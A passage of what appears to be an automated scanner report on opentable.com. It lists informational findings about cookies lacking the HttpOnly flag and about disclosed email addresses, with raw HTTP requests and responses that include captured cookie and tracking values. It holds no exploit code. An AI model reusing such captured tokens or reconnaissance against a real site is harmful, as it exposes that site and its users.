Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: jslt=DhNUH7QEwV0b0tKkwEp2937edj1JsmX2; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 199696


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en" xmlns
...[SNIP]...

7.4. http://www.opentable.com/opentables.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /opentables.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 03 Oct 2011 12:54:50 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: restrefwhite=90; domain=.opentable.com; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=1&vbefreg=1&abnsh=191%2c181&any=0; domain=.opentable.com; expires=Mon, 03-Oct-2016 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=HOc063kcXtuTOSWwv4Mb2w%3d%3d&ts=1&st=5; domain=.opentable.com; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 46252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
...[SNIP]...

7.5. http://www.opentable.com/restaurant-search.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /restaurant-search.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /restaurant-search.aspx?startDate=10%2F03%2F2011&ResTime=7%3A00+PM&PartySize=2&PartySizeFake=2+People&RestaurantID=90&rid=90&GeoID=4&txtDateFormat=MM%2Fdd%2Fyyyy&RestaurantReferralID=90 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]

Response

HTTP/1.1 302 Found
Date: Mon, 03 Oct 2011 12:54:44 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
Etag:
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Location: http://www.opentable.com/interim.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011 7:00 PM&rtype=ism_mod
Set-Cookie: pgseq=; domain=.opentable.com; expires=Wed, 03-Oct-2012 12:54:44 GMT; path=/
Set-Cookie: ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=0; domain=.opentable.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 247

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://www.opentable.com/interim.aspx?rid=90&amp;restref=90&amp;m=4&amp;t=single&amp;p=2&amp;d=10/3/2011 7:00 PM&amp;
...[SNIP]...

8. Email addresses disclosed  previous  next
There are 193 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


8.1. http://www.opentable.com//info/restaurateurs/img/common/1x1.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   //info/restaurateurs/img/common/1x1.gif

Issue detail

The following email address was disclosed in the response:

Request

GET //info/restaurateurs/img/common/1x1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 43
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:21 GMT

GIF89a.............!.......,...........D..;

8.2. http://www.opentable.com//info/restaurateurs/img/restjoinus/overview.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   //info/restaurateurs/img/restjoinus/overview.jpg

Issue detail

The following email address was disclosed in the response:

Request

GET //info/restaurateurs/img/restjoinus/overview.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 18828
Content-Type: image/jpeg
Last-Modified: Fri, 23 Sep 2011 02:10:38 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:20 GMT

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

...............................................................................................................
...[SNIP]...

8.3. http://www.opentable.com//info/restaurateurs/img/restjoinus/whitedots_278.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   //info/restaurateurs/img/restjoinus/whitedots_278.gif

Issue detail

The following email address was disclosed in the response:

Request

GET //info/restaurateurs/img/restjoinus/whitedots_278.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; InfoPath.3)
Proxy-Connection: Keep-Alive
Host: www.opentable.com
Cookie: s_vi=[CS]v1|2744D8A0051597FB-40000176E00002C7[CE]

Response

HTTP/1.1 200 OK
Content-Length: 236
Content-Type: image/gif
Last-Modified: Fri, 23 Sep 2011 02:10:40 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:58:22 GMT

GIF89a.......................................................................................................!.......,..........i.".d)Z.....$
"..Q.....`.......l8.....^.Y....~...(EV.X'1z.*.M..8MZ..!..=
...[SNIP]...

8.4. http://www.opentable.com/WebResource.axd  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /WebResource.axd

Issue detail

The following email address was disclosed in the response:

Request

GET /WebResource.axd?d=9MIXDm5qSekQJGh0ZMKoUBXqK1cTtQYEqPx-grAa4m7SLiJb1ZCChVIyrhawOT2OuVn_ebQiUDkVj7xQIiHA_ywQcGU1&t=634516341012771027 HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; pgseq=

Response

HTTP/1.1 200 OK
Cache-Control: public
Date: Mon, 03 Oct 2011 12:54:52 GMT
Content-Type: application/x-javascript
Expires: Tue, 02 Oct 2012 07:57:40 GMT
Last-Modified: Wed, 14 Sep 2011 23:53:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 21547

var Page_ValidationVer = "125";
var Page_IsValid = true;
var Page_BlockSubmit = false;
var Page_InvalidControlToBeFocused = null;
function ValidatorUpdateDisplay(val) {
if (typeof(val.display
...[SNIP]...

8.5. http://www.opentable.com/blank.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /blank.html

Issue detail

The following email address was disclosed in the response:

Request

GET /blank.html HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.opentable.com/opentables.aspx?rid=90&restref=90&m=4&t=single&p=2&d=10/3/2011%207:00%20PM&rtype=ism_mod
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D; lvCKE=tr=0&ts=0&g=02111003055450025564&vbefres=0&vbefreg=0&abnsh=191%2c181&any=0; restrefwhite=200; ftc=x=10%2f03%2f2011+15%3a54%3a50&p1q=rid%3d200%26rid%3d200%26restref%3d200&c=1&er=90&hr=http://www.grandcafe-sf.com/&tp=153&p1=117&rr1=200&rr2=200; lsCKE=ors=otrestref&cbref=1&restref=90&m=4&vbefres=1&vbefreg=1&hp=Jg8zl6%2fIssb0Gugv%2bBYb2g%3d%3d&ts=1&st=5; jslt=DhNUH7QEwV3Jv9lH5b7HaYn50h4yr3sP; pgseq=; s_cc=true

Response

HTTP/1.1 200 OK
Content-Length: 0
Content-Type: text/html
Last-Modified: Fri, 23 Sep 2011 02:11:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-02
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:22-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:53 GMT


8.6. http://www.opentable.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /favicon.ico

Issue detail

The following email address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lsCKE=ors=otrestref; s_vi=[CS]v1|2744D82905163E7C-40000198C000C552[CE]; restrefwhite=90; ftc=x=10%2f03%2f2011+15%3a54%3a44&p1=164&p1q=startDate%3d10%252f03%252f2011%26ResTime%3d7%253a00%2bPM%26PartySize%3d2%26PartySizeFake%3d2%2bPeople%26RestaurantID%3d90%26rid%3d90%26GeoID%3d4%26txtDateFormat%3dMM%252fdd%252fyyyy%26RestaurantReferralID%3d90&c=1&rr1=90&rr2=90&er=90&hr=http://www.grandcafe-sf.com/&tp=153; pgseq=; s_cc=true; s_nr=1317646509630-New; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=3024000
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Fri, 23 Sep 2011 02:11:06 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:54:51 GMT

............ .h.......(....... ..... .................................................................................................................................x...p...m...m...o...z.............
...[SNIP]...

8.7. http://www.opentable.com/frontdoor/css/ot_short.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/css/ot_short.css

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/css/ot_short.css?v=Web_11_10_0_11.prod.com HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/css,*/*;q=0.1
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pgseq=; ftc=x=10%2f03%2f2011+15%3a53%3a35&p1=220&p1q=rid%3d90%26restref%3d90%26bgcolor%3de3d4a4%26titlecolor%3d000000%26subtitlecolor%3d000000%26btnbgimage%3dhttp%253a%252f%252fwww.opentable.com%252ffrontdoor%252fimg%252fot_btn_black.png%26otlink%3dFFFFFF%26icon%3ddark%26mode%3dshort&c=0; lsCKE=ors=otrestref

Response

HTTP/1.1 200 OK
Content-Length: 4496
Content-Type: text/css
Last-Modified: Fri, 23 Sep 2011 02:15:30 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
Date: Mon, 03 Oct 2011 12:53:38 GMT

.ui-datepicker{font-family:verdana,arial,helvetica,sans-serif;font-size:10.6px!important;margin-left:-34px!important;}.ui-widget{width:157px;}.ui-datepicker td span,.ui-datepicker td a{display:block;p
...[SNIP]...

8.8. http://www.opentable.com/frontdoor/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opentable.com
Path:   /frontdoor/default.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /frontdoor/default.aspx?rid=90&restref=90&bgcolor=e3d4a4&titlecolor=000000&subtitlecolor=000000&btnbgimage=http://www.opentable.com/frontdoor/img/ot_btn_black.png&otlink=FFFFFF&icon=dark&mode=short HTTP/1.1
Host: www.opentable.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.grandcafe-sf.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Mon, 03 Oct 2011 12:53:35 GMT
Pragma: no-cache
Content-Type: text/javascript; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP="CAO PSA OUR"
X-OpenTableHost: SC-NA-WEB-01
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "support@opentable.com" on "2008.12.01T18:21-0800" exp "2035.12.31T12:00-0800" r (v 0 s 0 n 0 l 0))
X-AspNet-Version: 2.0.50727
